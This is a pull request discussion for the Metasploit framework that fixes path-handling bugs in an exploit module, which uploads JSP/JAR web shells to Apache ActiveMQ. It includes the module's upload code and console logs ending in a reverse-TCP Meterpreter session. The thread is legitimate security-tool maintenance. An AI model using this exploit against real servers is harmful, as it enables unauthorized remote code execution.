### PR TITLE
Update apache_activemq_upload_jsp.rb to fix missing checks and add missing slashes to some requests

### LINKED ISSUE #15338: exploit/multi/http/apache_activemq_upload_jsp - minor code error
## Steps to reproduce

How'd you do it?

1. Run msfconsole
2. use exploit/multi/http/apache_activemq_upload_jsp
3. Set the parameters for a vulnerable host.

## Expected behavior

What should happen?
The exploit should run successfully on a vulnerable target.
## Current behavior
The exploit fails.
What happens instead?
The console prints that the exploit is being uploaded similarly to an output like this:
http://host:portC:\apache-activemq-5.11.1\bin\win64\..\../webapps/api/TUybAWNAXX.jar
image

Where host is the rhost and port is rport. There is no / in between the paths.
### Metasploit version
6.0.47-dev

## Additional Information
I've created a pull request with the tiny change in code.

### PR DESCRIPTION
**Pull request by 0xShoreditch**
Fixes #15338

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.
The issue number is in relation to #15338. Corrected a minor error where the URI and filesystem path were not separated.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/apache_activemq_upload_jsp`
- [x] Set the required parameters
- [x] Run - should be successful on a vulnerable target, and the path should print correctly as shown: `http://host:port/C:\apache-activemq-5.11.1\bin\win64\..\../webapps/api/TUybAWNAXX.jar` where host is rhost, and port is rport. 

image

### CODE REVIEW

File: modules/exploits/multi/http/apache_activemq_upload_jsp.rb [hunk 1]
```diff
@@ -91,7 +91,7 @@ def try_upload(path, jar_payload, payload_name)
     ['.jar', '.jsp'].each do |ext|
       file_name = payload_name + ext
       data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
-      move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" }
+      move_headers = { 'Destination' => "#{@url}/#{path}#{file_name}" }
```
Comment (gwillcox-r7) [inline modules/exploits/multi/http/apache_activemq_upload_jsp.rb:94]: Technically speaking shouldn't there also be a slash after `#{path}` as well? It would appear that `normalize_url()`, according to https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/auxiliary/dos/http/rails_action_view.rb#L59-L64, is only responsible for making sure the URL has a starting slash and that it doesn't contain any double slashes.

```suggestion
      move_headers = { 'Destination' => "#{@url}/#{path}/#{file_name}" }
```

**Review by gwillcox-r7 — DISMISSED** [review]

File: modules/exploits/multi/http/apache_activemq_upload_jsp.rb (hunk 1 above)
Comment (gwillcox-r7) [reply modules/exploits/multi/http/apache_activemq_upload_jsp.rb:94]: Here is an example of why this is important:

```
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set UploadPath asdf
UploadPath => asdf
msf6 exploit(multi/http/apache_activemq_upload_jsp) > show options

Module options (exploit/multi/http/apache_activemq_upload_jsp):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   AutoCleanup    true             no        Remove web shells after callback is received
   BasicAuthPass  admin            yes       The password for the specified username
   BasicAuthUser  admin            yes       The username to authenticate as
   JSP                             no        JSP name to use, excluding the .jsp extension (default: random)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          8161             yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                           no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.31.30.163    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/apache_activemq_upload_jsp) > run

[*] Started reverse TCP handler on 172.31.30.163:4444 
[-] Exploit aborted due to failure: unreachable: Couldn't connect to the target!
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/apache_activemq_upload_jsp) > run

[*] Started reverse TCP handler on 172.31.30.163:4444 

From: /home/gwillcox/git/metasploit-framework/modules/exploits/multi/http/apache_activemq_upload_jsp.rb:95 Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule#try_upload:

     90: def try_upload(path, jar_payload, payload_name)
     91:   ['.jar', '.jsp'].each do |ext|
     92:     file_name = payload_name + ext
     93:     data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
     94:     require 'pry'; binding.pry
 =>  95:     move_headers = { 'Destination' => "#{@url}/#{path}#{file_name}" }
     96:     upload_uri = normalize_uri('fileserver', file_name)
     97:     print_status("Uploading #{move_headers['Destination']}")
     98:     register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true')
     99:     return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&
    100:                             send_request('MOVE', upload_uri, 204, 'headers' => move_headers)
    101:     @trigger_resource = /webapps(.*)/.match(path)[1]
    102:   end
    103:   true
    104: end

[1] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> @url
=> "http://127.0.0.1:8161"
[2] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> path
=> "/webapps/asdf"
[3] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> file_name
=> "tvVssPhcUW.jar"
[4] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> 
[5] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> move_headers
=> {"Destination"=>"http://127.0.0.1:8161//webapps/asdftvVssPhcUW.jar"}
[6] pry(#<Msf::Modules::Exploit__Multi__Http__Apache_activemq_upload_jsp::MetasploitModule>)> 
```

As one can see from the output above, if the user doesn't append a `/` to the end of their custom upload path, then the file uploads will be messed up and the contents of `file_name` and `path` will be concatenated together into the name of the file to be uploaded, which is not what we want.

Comment (0xShoreditch) [reply modules/exploits/multi/http/apache_activemq_upload_jsp.rb:94]: Adding another forward slash does technically still work, but the main problem here was its lack of presence in the first part of the URL and the module failing to execute because of that.

**Comment by gwillcox-r7** [comment]
Going to push some updates which should fix this issue and some others I found during testing. Here is the output after those changes were made:

```
msf6 exploit(multi/http/apache_activemq_upload_jsp) > show options

Module options (exploit/multi/http/apache_activemq_upload_jsp):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   AutoCleanup    true             no        Remove web shells after callback is received
   BasicAuthPass  admin            yes       The password for the specified username
   BasicAuthUser  admin            yes       The username to authenticate as
   JSP                             no        JSP name to use, excluding the .jsp extension (default: random)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          8161             yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                           no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/apache_activemq_upload_jsp) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444 
[*] Uploading http://127.0.0.1:8161//opt/activemq/webapps/api//mNhqqxqibzBbGvw.jar
[*] Uploading http://127.0.0.1:8161//opt/activemq/webapps/api//mNhqqxqibzBbGvw.jsp
[*] Sending stage (58082 bytes) to 172.18.0.2
[+] Deleted /opt/activemq/webapps/api//mNhqqxqibzBbGvw.jar
[+] Deleted /opt/activemq/webapps/api//mNhqqxqibzBbGvw.jsp
[*] Meterpreter session 2 opened (172.18.0.1:4444 -> 172.18.0.2:52620) at 2021-06-14 14:55:52 -0500

meterpreter > 
```

File: modules/exploits/multi/http/apache_activemq_upload_jsp.rb (hunk 1 above)
Comment (gwillcox-r7) [reply modules/exploits/multi/http/apache_activemq_upload_jsp.rb]: Fixed in https://github.com/rapid7/metasploit-framework/pull/15337/commits/5b274770ef9f0bfd0f247af8f8569bcbbc5fb3de

**Comment by gwillcox-r7** [comment]
# Release Notes
A bug has been fixed in `apache_activemq_upload_jsp.rb` whereby the URI and filesystem path were not separated appropriately. Additionally, appropriate checks were added to handle error conditions.
